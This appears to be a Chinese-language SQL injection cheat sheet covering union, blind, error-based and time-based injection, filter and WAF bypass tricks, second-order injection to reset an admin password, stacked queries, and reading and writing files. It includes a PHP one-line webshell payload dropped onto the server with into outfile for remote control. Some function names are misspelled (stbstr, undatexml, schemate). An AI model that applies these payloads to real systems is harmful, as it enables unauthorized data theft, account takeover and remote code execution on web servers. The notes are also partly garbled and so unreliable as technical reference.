判断: id= 1 2 ‘ ') ‘) " ") ")) 构成闭合尝试报错判断注点
查询语句:
order by 字段查询 报错反馈字段 or and 的使用
简单的显错注入语句联合查询
union select 1,2,3--+ 更改2的值: 单个查询使用limit(0,1)
查库
select schema_name from information_schema.schemate
查表 有时直接在语句后空格拼接limit 1,1
select table_name from information_schema.tables where table_schema=database()
查列
select column_name from information_schema.columns where table_name='表名'(有时用0x 16)
!!可用group_concat多个查询,但长度不够会出现显示不出所有信息
读写:
into dumpfile()
into outfile()
load_file()
union select 1,'<?php eval($_REQUEST[8]?>'into outfile'路径位置'最好用双斜杠 即读写
盲注:
length()显示字符串长度
stbstr()截取字符串
ASCII()变为ascii码
报错:
concat(0x7e,(查询语句),0x7e)
undatexml(1,2,3)--+其中2可以变为concat(0x7e,(select database()),0x7e)
时间型sleep()
if(1,2,3)第一个语句正确执行2 错误执行3
burp 暴力破解
万能密码 加查询语句达到渗透
请求头 ,cookie注入
过滤:
Base64 编码解码
不能注释掉尾部语句 可用 and '1'='1
二次注入
先写入再利用 比如修改admin的密码 可恶意注册admin'#这样的一个账号 改账号密码使 admin的密码也被修改 从而登录admin
&&和and一致 ||和or一致 可将&&进行URL转码
用%0a和%a0替代空格 或者用()包裹 建议多用括号
select部分大小写绕过过滤 可用盲注绕过select 和union
参数污染相同的参数不同的处理方式造成
防止'可以用宽字节 后加入16进制转义
post可在抓包后改Hex表中的 也可以用3字节汉字来绕过
堆叠注入 可以直接加数据或者恶意删除改密码也行 可以加一句话木马用菜刀